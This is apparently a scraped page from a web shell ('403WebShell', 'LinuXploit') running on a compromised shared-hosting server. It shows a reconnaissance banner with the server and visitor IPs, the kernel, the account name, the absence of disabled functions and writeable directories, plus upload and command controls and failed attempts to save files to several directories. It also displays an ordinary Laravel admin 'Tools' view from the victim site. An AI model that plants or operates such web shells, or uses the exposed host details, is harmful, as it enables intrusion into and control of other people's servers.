Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.237.229
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/446124706a3185218db950688eebbbd85582e9f6.php
<?php $__env->startSection('content'); ?>
    <?php
    $user = \Illuminate\Support\Facades\Auth::user();
    $hasAvailableTools = false;
    ?>
    <div class="container">
        <div class="row">
            <div class="col-md-1"></div>
            <div class="col-md-10">
                <div class="d-flex justify-content-between mb20">
                    <h1 class="title-bar"><?php echo e(__('Tools')); ?></h1>
                </div>
                <div class="panel">
                    <div class="panel-body pd15">
                        <div class="row area-setting-row">
                            <?php if($user->hasPermissionTo('language_manage')): ?>
                                <?php $hasAvailableTools = true; ?>
                                <div class="col-md-4">
                                    <div class="area-setting-item">
                                        <a class="setting-item-link" href="<?php echo e(route('language.admin.index')); ?>">
                                            <span class="setting-item-media">
                                                <i class="icon ion-ios-globe"></i>
                                            </span>
                                            <span class="setting-item-info">
                                                <span class="setting-item-title"><?php echo e(__("Languages")); ?></span>
                                                <span class="setting-item-desc"><?php echo e(__("Manage languages of your website")); ?></span>
                                            </span>
                                        </a>
                                    </div>
                                </div>
                            <?php endif; ?>
                            <?php if($user->hasPermissionTo('language_translation')): ?>
                                <?php $hasAvailableTools = true; ?>
                                <div class="col-md-4">
                                    <div class="area-setting-item">
                                        <a class="setting-item-link" href="<?php echo e(route('language.admin.translations.index')); ?>">
                                            <span class="setting-item-media">
                                                <i class="icon ion-ios-globe"></i>
                                            </span>
                                            <span class="setting-item-info">
                                                <span class="setting-item-title"><?php echo e(__("Translations")); ?></span>
                                                <span class="setting-item-desc"><?php echo e(__("Translation manager of your website")); ?></span>
                                            </span>
                                        </a>
                                    </div>
                                </div>
                            <?php endif; ?>
                            <?php if($user->hasPermissionTo('system_log_view')): ?>
                                <?php $hasAvailableTools = true; ?>
                                <div class="col-md-4">
                                    <div class="area-setting-item">
                                        <a class="setting-item-link" href="<?php echo e(url('admin/logs')); ?>">
                                                <span class="setting-item-media">
                                                    <i class="icon ion-ios-nuclear"></i>
                                                </span>
                                            <span class="setting-item-info">
                                                <span class="setting-item-title"><?php echo e(__("System Log Viewer")); ?></span>
                                                <span class="setting-item-desc"><?php echo e(__("Views and manage system log of your website")); ?></span>
                                            </span>
                                        </a>
                                    </div>
                                </div>
                            <?php endif; ?>
                            <?php if($user->hasPermissionTo('system_log_view')): ?>
                                <?php $hasAvailableTools = true; ?>
                                <div class="col-md-4 d-none">
                                    <div class="area-setting-item">
                                        <a class="setting-item-link" href="<?php echo e(route('core.admin.updater.index')); ?>">
                                        <span class="setting-item-media">
                                            <i class="icon ion-ios-nuclear"></i>
                                        </span>
                                            <span class="setting-item-info">
                                            <span class="setting-item-title"><?php echo e(__("Updater")); ?></span>
                                            <span class="setting-item-desc"><?php echo e(__("Updater Booking Core")); ?></span>
                                        </span>
                                        </a>
                                    </div>
                                </div>
                            <?php endif; ?>
                            <?php if($user->hasPermissionTo('plugin_manage')): ?>
                                <?php $hasAvailableTools = true; ?>
                                <div class="col-md-4">
                                    <div class="area-setting-item">
                                        <a class="setting-item-link" href="<?php echo e(route('core.admin.plugins.index')); ?>">
                                        <span class="setting-item-media">
                                            <i class="icon ion-md-color-wand"></i>
                                        </span>
                                            <span class="setting-item-info">
                                            <span class="setting-item-title"><?php echo e(__("Plugins")); ?></span>
                                            <span class="setting-item-desc"><?php echo e(__("Plugins for Booking Core")); ?></span>
                                        </span>
                                        </a>
                                    </div>
                                </div>
                            <?php endif; ?>
                            <?php if(!$hasAvailableTools): ?>
                                <div class="col-md-12">
                                    <?php echo e(__("No tools available")); ?>

                                </div>
                            <?php endif; ?>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('admin.layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/wavevlvu/book24.ng/modules/Core/Views/admin/tools/index.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit